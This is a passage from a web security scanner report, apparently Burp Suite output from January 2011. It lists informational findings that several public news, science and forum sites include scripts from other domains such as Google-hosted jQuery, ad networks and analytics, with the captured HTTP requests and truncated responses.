Last-modified: Fri, 10 Dec 2010 17:57:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.55. http://earthsky.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://earthsky.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: earthsky.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 02:08:12 GMT
X-Pingback: http://earthsky.org/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-nollkmcj=4EAA623C76FDF55310FACF40BC17B580; path=/
Content-Length: 50113


<!DOCTYPE HTML>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>EarthSky.org - A Clear Voice for Science</title>

<link rel='stylesheet' id='pret
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js?ver=2.9.2'></script>
...[SNIP]...
<!-- Google DFP Ad Code -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.56. http://editorial.autos.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=809818d765004928b3863b73ae1a7281; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1E98BFEFC7AD4A61B8576A26797B1A16; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div>..<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.57. http://editorial.autos.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /slideshow.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /slideshow.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:09 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7b4a758c71c84b67bd5ca4184af69515; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EE184531720E4743A15DC3BBC4F0985E; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...

23.58. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:46:12 GMT
Date: Sun, 30 Jan 2011 14:46:12 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
Content-Length: 58745
Content-Type: text/html
Age: 86
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- googleoff:
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.59. http://entertainment.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 51392
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=77a66bfe41db42d28e4f88077be1798b; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.60. http://entertainment.redacted/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62350
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=995146dbfad74c20970e903f13e0f1ce; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Just In Ne
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.61. http://entertainment.redacted/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /video/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26701
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=67f07d4e22dd45d1976d2b39e3c3771d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Entert
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<td valign="top"><SCRIPT type=text/javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx_Min.js"></SCRIPT>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.62. http://eurekalert.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eurekalert.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: eurekalert.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
X-Powered-By: PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 64809

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org /TR/REC-html40/loose.dtd">
<html>
<head>
<title>EurekAlert! - Science News</title>
<meta http-equiv=content-type c
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.63. http://expression.microsoft.com/en-us/cc136530.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://expression.microsoft.com
Path:   /en-us/cc136530.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/cc136530.aspx HTTP/1.1
Host: expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAD4BwAAfetuS+xFfAxTn86aknonWg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:41:15 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:15 GMT
Content-Length: 66884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link i
...[SNIP]...
</noscript>
<script src="http://Ads1.redacted/library/dap.js" type="text/javascript"></script>
...[SNIP]...

23.64. http://fancybox.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fancybox.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: fancybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 9835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
</title>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.65. http://fitbie.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.redacted
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: fitbie.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sat, 29 Jan 2011 15:01:40 +0000
ETag: "1296313300-1"
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:17 GMT
Date: Sat, 29 Jan 2011 23:46:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...

23.66. http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.redacted
Path:   /eat-right/tips/stock-your-refrigerator-weight-loss

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /eat-right/tips/stock-your-refrigerator-weight-loss HTTP/1.1
Host: fitbie.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sat, 29 Jan 2011 23:30:18 +0000
ETag: "1296343818-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42237
Expires: Sun, 30 Jan 2011 11:30:19 GMT
Date: Sat, 29 Jan 2011 23:46:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...

23.67. http://forums.silverlight.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; expires=Sun, 29-Jan-2012 23:15:21 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; expires=Sun, 29-Jan-2012 23:15:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:35:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:21 GMT
Content-Length: 62092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.68. http://forums.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:22 GMT
Content-Length: 531


<html><head></head><body><body bgcolor="#FFFFFF"><!-- begin ZEDO for channel: Neudesic , publisher: Neudesic , Ad Dimension: Super Banner - 728 x 90 -->
<script language="JavaScript">
var zflag_ni
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

23.69. http://forums.silverlight.net/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 62169
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:48 GMT; expires=Sun, 29-Jan-2012 23:20:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.70. http://forums.silverlight.net/forums/13.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/13.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/13.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72202
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Instal
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.71. http://forums.silverlight.net/forums/14.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/14.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/14.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73488
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:22 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Gettin
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.72. http://forums.silverlight.net/forums/15.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/15.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/15.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76271
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
